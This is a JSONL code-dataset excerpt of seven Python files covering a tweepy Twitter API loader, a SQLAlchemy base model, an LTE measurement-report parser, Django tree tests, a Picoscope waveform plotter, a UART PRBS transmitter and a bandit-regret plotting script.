+{"seq_id": "596920294", "text": "import json\nimport tweepy\nfrom tweepy import OAuthHandler\n\nclass _Twitter(type):\n\tdef __call__(cls, *args, **kwargs):\n\t\tif not hasattr(cls, 'instance'):\n\t\t\tcls.instance = super(_Twitter, cls).__call__(*args, **kwargs)\n\t\treturn cls.instance\n\nclass Twitter(object, metaclass=_Twitter):\n\tdef __init__(self):\n\t\tself.consumer_key = ''\n\t\tself.consumer_secret = ''\n\t\tself.access_key = ''\n\t\tself.access_secret = ''\n\t\tself.session = None\n\t\tself.api = None\n\t\tself.maxPage = 0\n\t\tself.maxCount = 0\n\n\tdef loadConfig(self):\n\t\twith open(\"config.json\") as data:\n\t\t\tconf = json.load(data)\n\t\t\tself.consumer_key = conf['consumer_key']\n\t\t\tself.consumer_secret = conf['consumer_secret']\n\t\t\tself.access_key = conf['access_key']\n\t\t\tself.access_secret = conf['access_secret']\n\t\t\tself.maxCount = int(conf['maxCount'])\n\t\t\tself.maxPage = int(conf['maxPage'])\n\t\treturn self\n\n\tdef auth(self):\n\t\tif self.session is None:\n\t\t\tself.session = OAuthHandler(self.consumer_key, self.consumer_secret)\n\t\t\tself.session.set_access_token(self.access_key, self.access_secret)\n\t\t\tself.api = tweepy.API(self.session, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True)\n\t\treturn self\n\n\tdef getAPI(self):\n\t\treturn self.api\n\n\tdef getMaxCount(self):\n\t\treturn self.maxCount\n\n\tdef getMaxPage(self):\n\t\treturn self.maxPage\n\n\nAPI = Twitter().loadConfig().auth().getAPI()\nMaxCount = Twitter().getMaxCount()\nMaxPage = Twitter().getMaxPage()", "sub_path": "TwitterScraper/Twitter/Twitter.py", "file_name": "Twitter.py", "file_ext": "py", "file_size_in_byte": 1407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "127485154", "text": "from datetime import datetime, timezone\n\nfrom app.configs.database import SingletonSQLAlchemy\n\n\ndb = SingletonSQLAlchemy()\n\n\nclass BaseModel(db.Model):\n __abstract__ = True\n\n id = db.Column(db.Integer, primary_key=True)\n create_at = db.Column(db.DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))\n updated_at = db.Column(db.DateTime(timezone=True), nullable=True)\n\n def before_save(self, *args, **kwargs):\n return\n\n def before_save(self, *args, **kwargs):\n return\n\n def save(self, commit=True):\n self.before_save()\n\n db.session.add(self)\n if commit:\n try:\n db.session.commit()\n except Exception as error:\n db.session.rollback()\n raise error\n\n self.before_save()\n\n def delete(self, commit=True):\n db.session.delete(self)\n if commit:\n db.session.delete(self)\n", "sub_path": "app/models/bases_model.py", "file_name": "bases_model.py", "file_ext": "py", "file_size_in_byte": 933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "app.configs.database.SingletonSQLAlchemy", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 13, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 13, "usage_type": "name"}]}
+{"seq_id": "495205823", "text": "from lxml import etree\nimport dateutil.parser\nfrom pandas import DataFrame, Series\nimport pandas as pd\nfrom functools import reduce\nimport json\nimport pymongo\nfrom pymongo import MongoClient\n\nclass MroReader:\n def __init__(self, afilter, **kwargs):\n super().__init__(**kwargs)\n self.item_dicts=[]\n self.afilter=afilter\n\n def display(self):\n for item_dict in self.item_dicts:\n print(item_dict)\n\n def read(self, item_measurement, item_id):\n for item_element in item_measurement:\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').split(' ')\n else:\n centerFilled=False\n item_dict = {}\n neighbor_list=[]\n for item_v in item_element:\n item_value = item_v.text.replace('NIL', '-1').split(' ')\n _item_sub_dict = dict(zip(item_key, map(int, item_value)))\n _item_sub_dict = {k: v for k, v in _item_sub_dict.items() if not any(ext in k for ext in self.afilter)}\n if _item_sub_dict['LteNcPci']>=0:\n _neighbor={}\n _neighbor.update({'Pci': _item_sub_dict['LteNcPci']})\n _neighbor.update({'Rsrp': _item_sub_dict['LteNcRSRP']})\n neighbor_list.append(_neighbor)\n else:\n break\n if not centerFilled:\n item_dict.update(item_element.attrib)\n item_dict.update({'Rsrp': _item_sub_dict['LteScRSRP']})\n item_dict.update({'SinrUl': _item_sub_dict['LteScSinrUL']})\n item_dict.update({'Ta': _item_sub_dict['LteScTadv']})\n item_dict.update({'Pci': _item_sub_dict['LteScPci']})\n centerFilled=True\n if len(neighbor_list)>0:\n item_dict.update({'NeighborList': neighbor_list})\n self.item_dicts.append(item_dict)\n\n def read_zte(self, item_measurement, item_id):\n for item_element in item_measurement:\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').split(' ')\n if 'LteScEarfcn' not in item_key:\n return\n else:\n centerFilled=False\n item_dict = {}\n neighbor_list=[]\n for item_v in item_element:\n item_value = item_v.text.replace('NIL', '-1').split(' ')\n _item_sub_dict = dict(zip(item_key, map(int, item_value)))\n _item_sub_dict = {k: v for k, v in _item_sub_dict.items() if not any(ext in k for ext in self.afilter)}\n if _item_sub_dict['LteNcPci']>=0:\n _neighbor={}\n _neighbor.update({'Pci': _item_sub_dict['LteNcPci']})\n _neighbor.update({'Rsrp': _item_sub_dict['LteNcRSRP']})\n neighbor_list.append(_neighbor)\n else:\n break\n if not centerFilled:\n item_dict.update({'id': item_id+'-'+item_element.attrib['MR.objectId']})\n item_dict.update({'Rsrp': _item_sub_dict['LteScRSRP']})\n item_dict.update({'SinrUl': _item_sub_dict['LteScSinrUL']})\n item_dict.update({'Ta': _item_sub_dict['LteScTadv']})\n item_dict.update({'Pci': _item_sub_dict['LteScPci']})\n centerFilled=True\n if len(neighbor_list)>0:\n item_dict.update({'NeighborList': neighbor_list})\n self.item_dicts.append(item_dict)\n\n def _filter_by_neighbor_len(self, length):\n return list(filter(lambda x: True if len(x['NeighborList'])==length else False, self.item_dicts))\n\n def _map_neighbor_rsrp_diff(self, index):\n measureList=self._filter_by_neighbor_len(index)\n if len(measureList)==0:\n return []\n return list(map(lambda item: {\n 'CellId': item['id'],\n 'NeighborPci': item['NeighborList'][index-1]['Pci'],\n 'RsrpDiff': item['Rsrp']-item['NeighborList'][index-1]['Rsrp'],\n 'Rsrp': item['Rsrp'],\n 'Pci': item['Pci'],\n 'Ta': item['Ta'],\n 'SinrUl': item['SinrUl']\n }, measureList))\n\n def map_rsrp_diff(self):\n diff_list=list(map(lambda index: self._map_neighbor_rsrp_diff(index+1), list(range(6))))\n combined_list=reduce(lambda first,second: 
first+second,diff_list,[])\n if len(combined_list)==0:\n return []\n stat_list=list(map(lambda item: {\n 'CellId': item['CellId'],\n 'NeighborPci': item['NeighborPci'],\n 'Pci': item['Pci'],\n 'Diff0': 1 if item['RsrpDiff']<=0 else 0,\n 'Diff3': 1 if item['RsrpDiff']<=3 and item['RsrpDiff']>0 else 0,\n 'Diff6': 1 if item['RsrpDiff']<=6 and item['RsrpDiff']>3 else 0,\n 'Diff9': 1 if item['RsrpDiff']<=9 and item['RsrpDiff']>6 else 0,\n 'Diff12': 1 if item['RsrpDiff']<=12 and item['RsrpDiff']>9 else 0,\n 'DiffLarge': 1 if item['RsrpDiff']>12 else 0,\n 'RsrpBelow120': 1 if item['Rsrp']<20 else 0,\n 'RsrpBetween120110': 1 if item['Rsrp']<30 and item['Rsrp']>=20 else 0,\n 'RsrpBetween110105': 1 if item['Rsrp']<35 and item['Rsrp']>=30 else 0,\n 'RsrpBetween105100': 1 if item['Rsrp']<40 and item['Rsrp']>=35 else 0,\n 'RsrpBetween10090': 1 if item['Rsrp']<50 and item['Rsrp']>=40 else 0,\n 'RsrpAbove90': 1 if item['Rsrp']>=50 else 0,\n 'Ta0or1': 1 if item['Ta']==0 or item['Ta']==1 else 0,\n 'Ta2or3': 1 if item['Ta']==2 or item['Ta']==3 else 0,\n 'Ta4or5': 1 if item['Ta']==4 or item['Ta']==5 else 0,\n 'Ta6or7': 1 if item['Ta']==6 or item['Ta']==7 else 0,\n 'Ta8or9': 1 if item['Ta']==8 or item['Ta']==9 else 0,\n 'Ta10to12': 1 if item['Ta']>=10 and item['Ta']<=12 else 0,\n 'Ta13to15': 1 if item['Ta']>=13 and item['Ta']<=15 else 0,\n 'Ta16to19': 1 if item['Ta']>=16 and item['Ta']<=19 else 0,\n 'Ta20to24': 1 if item['Ta']>=20 and item['Ta']<=24 else 0,\n 'Ta25to29': 1 if item['Ta']>=25 and item['Ta']<=29 else 0,\n 'Ta30to39': 1 if item['Ta']>=30 and item['Ta']<=39 else 0,\n 'TaAbove40': 1 if item['Ta']>=40 else 0,\n 'SinrUl0to9': 1 if item['SinrUl']>=0 and item['SinrUl']<=9 else 0,\n 'SinrUl10to19': 1 if item['SinrUl']>=10 and item['SinrUl']<=19 else 0,\n 'SinrUl20to24': 1 if item['SinrUl']>=20 and item['SinrUl']<=24 else 0,\n 'SinrUl25to29': 1 if item['SinrUl']>=25 and item['SinrUl']<=29 else 0,\n 'SinrUl30to34': 1 if item['SinrUl']>=30 and item['SinrUl']<=34 else 0,\n 'SinrUlAbove35': 1 if item['SinrUl']>=35 else 0\n }, combined_list))\n df = DataFrame(stat_list)\n stat=df.groupby(['CellId','Pci','NeighborPci']).sum().reset_index()\n return json.loads(stat.T.to_json()).values()\n\nclass MrsReader:\n def __init__(self, mrNames, startTime, date_dir, db, **kwargs):\n self.mrNames=mrNames\n self.startTime=startTime\n self.date_dir=date_dir\n self.db=db\n return super().__init__(**kwargs)\n\n def read(self, item_measurement):\n mrName=item_measurement.attrib['mrName'].replace('MR.','')\n if mrName in self.mrNames:\n item_dicts=[]\n for item_element in item_measurement.iterchildren():\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').replace('.','_').split(' ')\n else:\n item_dict={}\n item_dict.update({'CellId': item_element.attrib['id']})\n item_value = item_element[0].text.split(' ')\n item_dict.update(dict(zip(item_key, map(int, item_value))))\n item_dict.update({'StartTime': self.startTime})\n item_dicts.append(item_dict)\n if len(item_dicts)>0:\n self.db['mrs_'+mrName+'_'+self.date_dir].insert_many(item_dicts)\n\n def read_zte(self, item_measurement, eNodebId):\n mrName=item_measurement.attrib['mrName'].replace('MR.','')\n if mrName in self.mrNames:\n item_dicts=[]\n for item_element in item_measurement.iterchildren():\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').replace('.','_').split(' ')\n else:\n item_dict={}\n item_dict.update({'CellId': eNodebId+'-'+item_element.attrib['MR.objectId']})\n item_value = item_element[0].text.split(' 
')\n item_dict.update(dict(zip(item_key, map(int, item_value))))\n item_dict.update({'StartTime': self.startTime})\n item_dicts.append(item_dict)\n if len(item_dicts)>0:\n self.db['mrs_'+mrName+'_'+self.date_dir].insert_many(item_dicts)", "sub_path": "Lte.Auxilary/mr/mr_service.py", "file_name": "mr_service.py", "file_ext": "py", "file_size_in_byte": 9319, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "functools.reduce", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 139, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 141, "usage_type": "call"}]}
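The map_rsrp_diff tail above round-trips the grouped DataFrame through to_json and json.loads just to obtain row dicts; DataFrame.to_dict('records') produces them directly. A small sketch on hypothetical toy data:

from pandas import DataFrame

df = DataFrame([
    {'CellId': 'a', 'Pci': 1, 'NeighborPci': 2, 'Diff0': 1},
    {'CellId': 'a', 'Pci': 1, 'NeighborPci': 2, 'Diff0': 0},
])
stat = df.groupby(['CellId', 'Pci', 'NeighborPci']).sum().reset_index()
records = stat.to_dict('records')  # one plain dict per grouped row
print(records)  # [{'CellId': 'a', 'Pci': 1, 'NeighborPci': 2, 'Diff0': 1}]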
+{"seq_id": "96215502", "text": "import re\nimport json\nimport pprint\n\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\nfrom django.test.client import Client\n\nfrom assessment.tests import build_assessments_for_permissions_testing\nfrom utils.helper import HAWCDjangoJSONEncoder\n\nfrom .models import SummaryText\n\nclass SummaryTextTests(TestCase):\n def setUp(self):\n build_assessments_for_permissions_testing(self)\n\n @staticmethod\n def clean_json(json_dump):\n remove_fields = ['created', 'last_updated', 'slug', 'text', 'assessment']\n for node in json_dump:\n node.pop('id')\n for field in remove_fields:\n node['data'].pop(field)\n if node.get('children'):\n SummaryTextTests.clean_json(node['children'])\n\n\n def test_adding_texts(self):\n lvl_1a = SummaryText.add_summarytext(assessment=self.assessment_working,\n title='lvl_1a',\n slug='lvl_1a',\n text='text')\n\n lvl_1b = SummaryText.add_summarytext(assessment=self.assessment_working,\n title='lvl_1b',\n slug='lvl_1b',\n text='text')\n\n lvl_2a = SummaryText.add_summarytext(assessment=self.assessment_working,\n parent=[lvl_1a],\n title='lvl_2a',\n slug='lvl_2a',\n text='text')\n\n lvl_2b = SummaryText.add_summarytext(assessment=self.assessment_working,\n sibling=[lvl_2a],\n title='lvl_2b',\n slug='lvl_2b',\n text='text')\n\n assessment_root = SummaryText.get_assessment_root_node(self.assessment_working)\n\n tree_form = SummaryText.dump_bulk(assessment_root)\n # print pprint.pprint(tree_form)\n\n SummaryTextTests.clean_json(tree_form)\n self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2a\"}}, {\"data\": {\"title\": \"lvl_2b\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n\n # Swap 2a and 2b\n lvl_2b.move_summarytext(parent=lvl_1a, sibling=None)\n tree_form = SummaryText.dump_bulk(assessment_root)\n SummaryTextTests.clean_json(tree_form)\n self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2b\"}}, {\"data\": {\"title\": \"lvl_2a\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n # Swap back\n lvl_2b.move_summarytext(parent=None, sibling=lvl_2a)\n tree_form = SummaryText.dump_bulk(assessment_root)\n SummaryTextTests.clean_json(tree_form)\n self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2a\"}}, {\"data\": {\"title\": \"lvl_2b\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n", "sub_path": "project/summary/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "assessment.tests.build_assessments_for_permissions_testing", "line_number": 16, "usage_type": "call"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 30, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 30, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 35, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 35, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 40, 
"usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 40, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 46, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 46, "usage_type": "name"}, {"api_name": "models.SummaryText.get_assessment_root_node", "line_number": 52, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 52, "usage_type": "name"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 54, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 54, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 58, "usage_type": "call"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 63, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 63, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 69, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 69, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "613704701", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 22 18:33:47 2019\n\n@author: user\n\"\"\"\nimport numpy as np\nimport struct\nimport matplotlib.pyplot as plt #for displaying data\nfrom mpl_toolkits.mplot3d import Axes3D\nimport csv\nimport pandas as pd #to manage dataframe\nimport struct\nfrom math import sqrt\nimport os # file and path operrations\nimport time\nimport sys # get input arguments of the python program\n\n\n\nimport plotly\nimport plotly.graph_objs as go\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nfrom plotly.offline.offline import _plot_html\n\nimport glob #listing of files\nimport json\n\ndata_path = r\"../out/*/\"\noutput_path = r\"../temp/\"\npng_resolution_dpi = 300\n\n\ndirectories = glob.glob(data_path)\nic_cycle_order = []\n\n\nsorted_directories = sorted(directories)#sorted( directories, key = lambda directory: os.path.getctime(directory)) #getmtime for modified time\nprint(sorted_directories)\n# # for directory in sorted_directories:\n # # print(directory+'\\n')#print(\"{} - {}\".format(directory, time.ctime(os.path.getctime(directory))) )\n\nchannel = int(sys.argv[1]) \nprint('channel = \\n', channel);\nic_cycle = int(sys.argv[2]) \nprint('ic_cycle = \\n', ic_cycle);\nwb_cycle = int(sys.argv[3])\nprint('wb_cycle = \\n', wb_cycle);\nwb_sub_cycle = int(sys.argv[4])\nprint('wb_sub_cycle = \\n', wb_sub_cycle);\n\ntotal_ic_cycles = len(directories) # may add additional checks to avoid parasite folders added for testing\n# may also check json file to get metadata\n# manage the cases where user inputs exceed the limits ic and wb\n# total_wb_cycles = #get this from json file\n\n\n\nif ic_cycle > (total_ic_cycles - 1) :\n\tic_cycle = total_ic_cycles - 1 # this is to display the last data\n\n# confirm the data exist\n\nstream_filename = sorted_directories[ic_cycle] + \"ch_\" + str(channel) + \"_raw.dat\"\nprint(stream_filename);\n\nresult = sorted_directories[ic_cycle].find('IC_CYCLE') \nif result == -1:\n\tprint('Folder name incorrect \\n')\n\tsys.exit()\n\n\t\nwith open(sorted_directories[ic_cycle]+'cfg.json') as json_file: \n\tdata = json.load(json_file)\n\tsampling_period_ns = data['Oscilloscopes']['Picoscope 4444']['Sampling Period NS']\n\tresolution_bits = data['Oscilloscopes']['Picoscope 4444']['Sample Resolution bits']\n\tvoltage_range_str = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Voltage Range']\n\ttotal_samples_per_waveform = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveform Number of Samples']\t\n\twaveforms_per_wb_cycle = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveforms per WB Cycle']\t\n\t\n\trange_val, range_unit = voltage_range_str.split()\n\trange_val_mv = 0\n\tif range_unit == 'V':\n\t\trange_val_mv = 1000 * int(range_val)\n\telse:\n\t\trange_val_mv = int(range_val)\n\tprint ('range_mv =', range_val_mv)\t\t\t\n\t\n\t\nwith open(sorted_directories[ic_cycle]+'stat.json') as json_file: \n\tdata = json.load(json_file)\n\tcaptured_waveforms = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveforms found']\n\t\n\n\n\n# get the following data from json\nwb_cycle_total_samples = waveforms_per_wb_cycle * total_samples_per_waveform\ni = 0\nsample_offset = wb_cycle * wb_cycle_total_samples + wb_sub_cycle * total_samples_per_waveform\n\n\n\n\t\n\nexists = os.path.isfile(stream_filename)\nif exists:\n\t# Store configuration file values\n\ttest = 
0\nelse:\n\t# Keep presets\n\tprint('ch1 file does not exist \n')\n\tsys.exit()\n\nfp_stream = open(stream_filename, \"rb\")\nfp_stream.seek(sample_offset * 2)\nstream1 = np.fromfile(fp_stream, dtype=([('channel', '<i2')]))  # signed 16-bit counts, -maxADCValue..maxADCValue\ndata = np.float64(stream1['channel'])\ndata = data * range_val_mv / 32768\n\n\n\n\n# # Create a trace\ntrace = go.Scatter(\n y = stream1['channel']\n)\nlayout = go.Layout(\n margin=dict(\n l=0,\n r=0,\n b=0,\n t=0,\n\t\tpad=4\n ),\n paper_bgcolor='#7f7f7f',\n plot_bgcolor='#c7c7c7'\t\n)\nfig = plt.figure()\nfig = go.Figure(data=[trace], layout=layout)\nplotly.offline.plot(fig, filename= output_path + 'ch_' + str(channel) + \".html\", auto_open=False)\n\n\n", "sub_path": "prg/picoscope_4444/python/process_raw_html.py", "file_name": "process_raw_html.py", "file_ext": "py", "file_size_in_byte": 4168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "glob.glob", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 45, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 47, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 70, "usage_type": "call"}, {"api_name": "json.load", "line_number": 74, "usage_type": "call"}, {"api_name": "json.load", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 128, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 128, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 131, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 143, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 143, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 144, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 144, "usage_type": "attribute"}]}
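The fromfile/scaling lines in the record above follow a standard acquisition pattern: read little-endian 16-bit ADC counts through a structured dtype, then scale to millivolts by full-scale range over 32768. A self-contained round-trip sketch of that pattern; the range value and file name are assumptions.

import numpy as np

samples = np.array([0, 16384, -32768], dtype='<i2')   # fake raw capture
samples.tofile('demo_raw.dat')

raw = np.fromfile('demo_raw.dat', dtype=[('channel', '<i2')])
range_val_mv = 2000                                   # assume a +/-2 V range
mv = np.float64(raw['channel']) * range_val_mv / 32768
print(mv)                                             # [    0.  1000. -2000.]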
+{"seq_id": "96900209", "text": "import logging\nimport serial\nimport time\n\n###################################################################################\n\n\nclass CommUART(object):\n def __init__(self, address):\n self.address = address\n self.sc = None\n\n def connect(self):\n logging.debug(\"Opening COM port : {0}\".format(self.address))\n self.sc = None\n while self.sc is None:\n try:\n self.sc = serial.Serial(port=self.address, baudrate=3000000, rtscts=False)\n except serial.serialutil.SerialException as se:\n if 'Device or resource busy:' in se.__str__():\n logging.info('Opening COM port is taking a little while, please stand by...')\n else:\n logging.error('se: {0}'.format(se))\n time.sleep(1)\n logging.debug(\"COM port open successfully.\")\n self.sc.flushInput()\n\n def disconnect(self):\n logging.debug(\"Closing COM port : {0}\".format(self.address))\n self.sc.close()\n\n def receivedPacket(self, length):\n if self.sc is None:\n raise Exception('COM port is not opened.')\n packet = b''\n received = 0\n while received < length:\n serialByte = self.sc.read(1)\n if serialByte is None:\n raise Exception('Bad character.')\n elif len(serialByte) == 0:\n break\n elif received < length:\n received += 1\n packet += serialByte\n return packet\n \n def send(self, data):\n self.sc.write(bytes([data]))\n\n def prbs8(self, curval):\n newbit = (((curval >> 6) ^ (curval >> 5)) & 1)\n return ((curval << 1) | newbit) & 0x7f\n###################################################################################\n\ndef main():\n logging.basicConfig(level=logging.DEBUG, format='%(asctime)s : %(message)s')\n\n #comm = CommUART(\"/dev/cu.usbserial-FT0NCE8B\")\n #comm = CommUART(\"/dev/cu.usbmodem143422\")\n comm = CommUART(\"/dev/cu.usbmodem143132\")\n comm.connect()\n\n curval = 0\n #packet = comm.receivedPacket(1)\n #curval = int.from_bytes(packet, byteorder = 'little')\n val = comm.prbs8(0xff)\n byteCount = 0\n dropcnt = 0\n deltatime = 0\n drop = False\n while True:\n try:\n comm.send(val)\n startTime = time.time()\n# packet = comm1.receivedPacket(1)\n endTime = time.time()\n deltatime += endTime - startTime\n # curval = int.from_bytes(packet, byteorder = 'little')\n # if curval != val:\n # dropcnt += 1\n val = comm.prbs8(val)\n byteCount += 1\n\n if deltatime > 0:\n bytesPerSec = byteCount / deltatime #(endTime - startTime)\n\n #print(\"Bytes : {0}\".format(bytes))\n #if drop:\n # print(\"Dropped.... Bytes/sec : {0}\".format(bytesPerSec))\n #else:\n if (byteCount & 0xff) == 0:\n print(\"Bytes/sec : %.2f, drop %d \" %(bytesPerSec, dropcnt))\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt. 
Exiting.\")\n break\n\n comm.disconnect()\n # comm1.disconnect()\n###################################################################################\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "Python/uartprbs_tx.py", "file_name": "uartprbs_tx.py", "file_ext": "py", "file_size_in_byte": 3348, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.debug", "line_number": 14, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 18, "usage_type": "call"}, {"api_name": "serial.serialutil", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 57, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 75, "usage_type": "call"}, {"api_name": "time.time", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "533072377", "text": "import matplotlib.pyplot as plt \r\nimport numpy as np\r\nimport matplotlib.ticker as ticker\r\n\r\n# result_file = \"../expt/results/task4_1.txt\"\r\nresult_file = \"finalT2.txt\"#\"outputDataT2.txt\"\r\ninstance_list = [\"../instances/i-1.txt\",\"../instances/i-2.txt\",\"../instances/i-3.txt\"]\r\n# instance_list = [\"i-1.txt\",\"i-2.txt\",\"i-3.txt\"]\r\nalgorithms = [\"thompson-sampling\", \"thompson-sampling\"]\r\nfinal_dict = {\"../instances/i-1.txt\":{}, \"../instances/i-2.txt\":{}, \"../instances/i-3.txt\":{}}\r\nhorizons = [100, 400, 1600, 6400, 25600, 102400]\r\n# final_dict = {\"i-3.txt\":{}, \"i-1.txt\":{}, \"i-2.txt\":{}}\r\nwith open(result_file,'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n x = line.rstrip().split(', ')\r\n if x[1] in final_dict[x[0]].keys():\r\n final_dict[x[0]][x[1]][int(np.log2(int(x[4])/100)/2)] += float(x[5])/50.0\r\n else:\r\n final_dict[x[0]][x[1]] = [0]*6\r\n final_dict[x[0]][x[1]][int(np.log2(int(x[4])/100)/2)] += float(x[5])/50.0\r\n\r\nfor i,instance in enumerate(instance_list):\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n ax.set_xscale('log')\r\n ax.xaxis.set_ticks(horizons)\r\n ax.get_xaxis().set_major_formatter(ticker.ScalarFormatter())\r\n ts = final_dict[instance][\"thompson-sampling\"]\r\n plt.plot(horizons,ts,label=\"Thompson-Sampling\")\r\n ts = final_dict[instance][\"thompson-sampling-with-hint\"]\r\n plt.plot(horizons,ts,label=\"Thompson-Sampling (with Hint)\")\r\n plt.xlabel(\"Horizon (Logarithmic Scale, Base 2)\")\r\n plt.ylabel(\"Average Regret\")\r\n plt.legend()\r\n\r\n pltTitle = instance.replace('../instances/', '')\r\n pltTitle = pltTitle.replace('.txt', '')\r\n pltTitle = pltTitle.replace('i-', 'Instance ')\r\n # plt.plot(x_axis,kl_ucb,x_axis,ts,x_axis,ucb,x_axis,eg)\r\n plt.title(\"{}\".format(pltTitle))\r\n plt.savefig(\"testT2_instance{}.png\".format(i+1))", "sub_path": "Assignment1/submission/PlotGenT2.py", "file_name": "PlotGenT2.py", "file_ext": "py", "file_size_in_byte": 1863, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.log2", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": 